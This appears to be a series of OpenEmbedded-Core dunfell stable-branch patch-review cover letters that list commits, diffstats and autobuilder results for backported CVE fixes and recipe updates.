https://autobuilder.yoctoproject.org/typhoon/#/builders/83/builds/6348

The following changes since commit 55157aa2f8b157b1cc63e1134d9eba6db0cf16da:

  build-appliance-image: Update to dunfell head revision (2023-12-11 05:13:51 -1000)

are available in the Git repository at:

  https://git.openembedded.org/openembedded-core-contrib stable/dunfell-nut
  http://cgit.openembedded.org/openembedded-core-contrib/log/?h=stable/dunfell-nut

Bhabu Bindu (1):
  glibc: Fix CVE-2023-4813

Lee Chee Yang (2):
  perl: fix CVE-2023-31484/47038/47100
  binutils: Fix CVE-2023-25584

Vijay Anusuri (1):
  libxml2: Backport fix for CVE-2021-3516

Vivek Kumbhar (1):
  libsndfile: fix CVE-2021-4156 heap out-of-bounds read in src/flac.c in
    flac_buffer_copy

 .../glibc/glibc/CVE-2023-4813.patch           | 986 ++++++++++++++++++
 meta/recipes-core/glibc/glibc_2.31.bb         |   1 +
 .../libxml/libxml2/CVE-2021-3516.patch        |  35 +
 meta/recipes-core/libxml/libxml2_2.9.10.bb    |   1 +
 .../binutils/binutils-2.34.inc                |   1 +
 .../binutils/binutils/CVE-2023-25584.patch    | 530 ++++++++++
 .../perl/files/CVE-2023-31484.patch           |  27 +
 .../perl/files/CVE-2023-47038.patch           | 121 +++
 meta/recipes-devtools/perl/perl_5.30.1.bb     |   2 +
 .../libsndfile1/CVE-2021-4156.patch           |  30 +
 .../libsndfile/libsndfile1_1.0.28.bb          |   1 +
 11 files changed, 1735 insertions(+)
 create mode 100644 meta/recipes-core/glibc/glibc/CVE-2023-4813.patch
 create mode 100644 meta/recipes-core/libxml/libxml2/CVE-2021-3516.patch
 create mode 100644 meta/recipes-devtools/binutils/binutils/CVE-2023-25584.patch
 create mode 100644 meta/recipes-devtools/perl/files/CVE-2023-31484.patch
 create mode 100644 meta/recipes-devtools/perl/files/CVE-2023-47038.patch
 create mode 100644 meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-4156.patch

-- 
2.34.1

[OE-core][dunfell 0/5] Patch review

[Steve Sakoman]

Please review this set of changes for dunfell and have comments back by
end of day Tuesday, January 9

Passed a-full on autobuilder:

https://autobuilder.yoctoproject.org/typhoon/#/builders/83/builds/6418

The following changes since commit 3ea36d92800b139eaaf75995cdd59912b63db9ee:

  tzdata: Upgrade to 2023d (2024-01-02 03:43:26 -1000)

are available in the Git repository at:

  https://git.openembedded.org/openembedded-core-contrib stable/dunfell-nut
  http://cgit.openembedded.org/openembedded-core-contrib/log/?h=stable/dunfell-nut

Dhairya Nagodra (2):
  cve-update-nvd2-native: faster requests with API keys
  cve-update-nvd2-native: increase the delay between subsequent request
    failures

Dmitry Baryshkov (1):
  linux-firmware: upgrade 20230804 -> 20231030

Peter Marko (2):
  cve-update-nvd2-native: remove unused variable CVE_SOCKET_TIMEOUT
  cve-update-nvd2-native: make number of fetch attemtps configurable

 .../meta/cve-update-nvd2-native.bb            | 27 +++++++++++++------
 ...20230804.bb => linux-firmware_20231030.bb} |  4 +--
 2 files changed, 21 insertions(+), 10 deletions(-)
 rename meta/recipes-kernel/linux-firmware/{linux-firmware_20230804.bb => linux-firmware_20231030.bb} (99%)

-- 
2.34.1

[OE-core][dunfell 0/5] Patch review

[Steve Sakoman]

Please review this set of changes for dunfell and have comments back by
end of day Friday, April 12

Passed a-full on autobuilder:

https://autobuilder.yoctoproject.org/typhoon/#/builders/83/builds/6774

The following changes since commit 47ce772102b45db14dc21112367534ea1c37e33c:

  perf: bump PR to deal with sstate corruption on autobuilder (2024-04-02 05:46:56 -1000)

are available in the Git repository at:

  https://git.openembedded.org/openembedded-core-contrib stable/dunfell-nut
  http://cgit.openembedded.org/openembedded-core-contrib/log/?h=stable/dunfell-nut

Ashish Sharma (3):
  go: Backport fix for CVE-2024-24784
  xserver-xorg: Backport fix for CVE-2024-31081
  xserver-xorg: Backport fix for CVE-2024-31080

Colin McAllister (1):
  licenses.conf: Add missing LGPLv2.0+ license

Vijay Anusuri (1):
  ncurses: Backport fix for CVE-2023-50495

 meta/conf/licenses.conf                       |   1 +
 .../ncurses/files/CVE-2023-50495.patch        |  79 +++++++
 meta/recipes-core/ncurses/ncurses_6.2.bb      |   1 +
 meta/recipes-devtools/go/go-1.14.inc          |   1 +
 .../go/go-1.14/CVE-2024-24784.patch           | 205 ++++++++++++++++++
 .../xserver-xorg/CVE-2024-31080.patch         |  49 +++++
 .../xserver-xorg/CVE-2024-31081.patch         |  47 ++++
 .../xorg-xserver/xserver-xorg_1.20.14.bb      |   2 +
 8 files changed, 385 insertions(+)
 create mode 100644 meta/recipes-core/ncurses/files/CVE-2023-50495.patch
 create mode 100644 meta/recipes-devtools/go/go-1.14/CVE-2024-24784.patch
 create mode 100644 meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31080.patch
 create mode 100644 meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31081.patch

-- 
2.34.1